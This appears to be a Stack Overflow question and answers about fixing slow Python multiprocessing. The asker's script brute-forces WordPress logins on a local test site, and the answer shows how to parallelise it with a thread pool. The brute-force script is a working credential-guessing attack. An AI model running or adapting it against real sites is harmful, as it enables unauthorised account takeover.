# How fix multiprocessing in my code?

Tags: python, python-multiprocessing

Without multiprocessing my code brute-forced my test-site in 8 seconds (4 logins\100 passwords).
With `multiprocessing` it took 115 seconds instead.

```
import requests
import multiprocessing
import itertools
from concurrent.futures import ThreadPoolExecutor

def main(user, password):
    url = 'http://192.168.1.6/wp-login.php'
    payload = {'log': user, 'pwd': password}
    r = requests.post(url, data=payload)
    if ("/wp-admin/" in r.url):
        print("[+] {}/{}".format(user, password))
    else:
        print("[-] {}/{}".format(user, password))


if __name__ == '__main__':
    users = get_usernames()
    passwords = get_passwords()
    with ThreadPoolExecutor(max_workers=4) as pool:
        for user, password in itertools.product(users, passwords):
            pool.submit(main, user, password)
```

Comment: You probably want `itertools.izip` rather than `product`.

Comment: Don't vandalize your posts.

Answer (score 3):

NB: processes are the wrong tool for input/output related speedup. See [this discussion](https://stackoverflow.com/questions/3044580/multiprocessing-vs-threading-python).

---

You joined the process inside the loop, so the code is completely serial (each process completes before the next one is created). You need to move the `join`s into a separate loop.

```
processes = []
for user, password in itertools.product(users, passwords):
    p = multiprocessing.Process(target=main, args=(user, password))
    processes.append(p)
    p.start()

for p in processes:
    p.join()
```

To let the `multiprocessing` module handle this for you, look into using a [pool](https://docs.python.org/3/library/multiprocessing.html#using-a-pool-of-workers) instead of creating the processes manually. However, as mentioned above, you probably want a thread pool, not a process pool, in which case you should look [here](https://stackoverflow.com/questions/3044580/multiprocessing-vs-threading-python).

---

As requested, an example of using a pool:

```
from concurrent.futures import ThreadPoolExecutor
import itertools

def foo(a, b):
    print(a, b)

if __name__ == '__main__':
    names = ['jim', 'john', 'jill', 'jen']
    passwords = ['1', '2', '3', '4', '5', '6']

    with ThreadPoolExecutor(max_workers = 4) as pool:
        for name, password in itertools.product(names, passwords):
            pool.submit(foo, name, password)
```

Comment: @ThelazyadherentofPython Well, yes. You're probably spawning a huge number of processes. As I said, you should be using a pool with a limited number of processes or a thread pool.

Comment: I have been through the past four days used Pool, but it's not work, because I don't know how put my user and password as one argument.
I mean, p = multiprocessing.Pool(main, list), where list should be my user and password.

Comment: @ThelazyadherentofPython use [starmap](https://docs.python.org/3/library/multiprocessing.html#multiprocessing.pool.Pool.starmap).

Comment: Can u make example using my code, because I trying and only more problems.

Comment: @ThelazyadherentofPython I've added an example using a `ThreadPoolExecutor`, which is the right thing to use.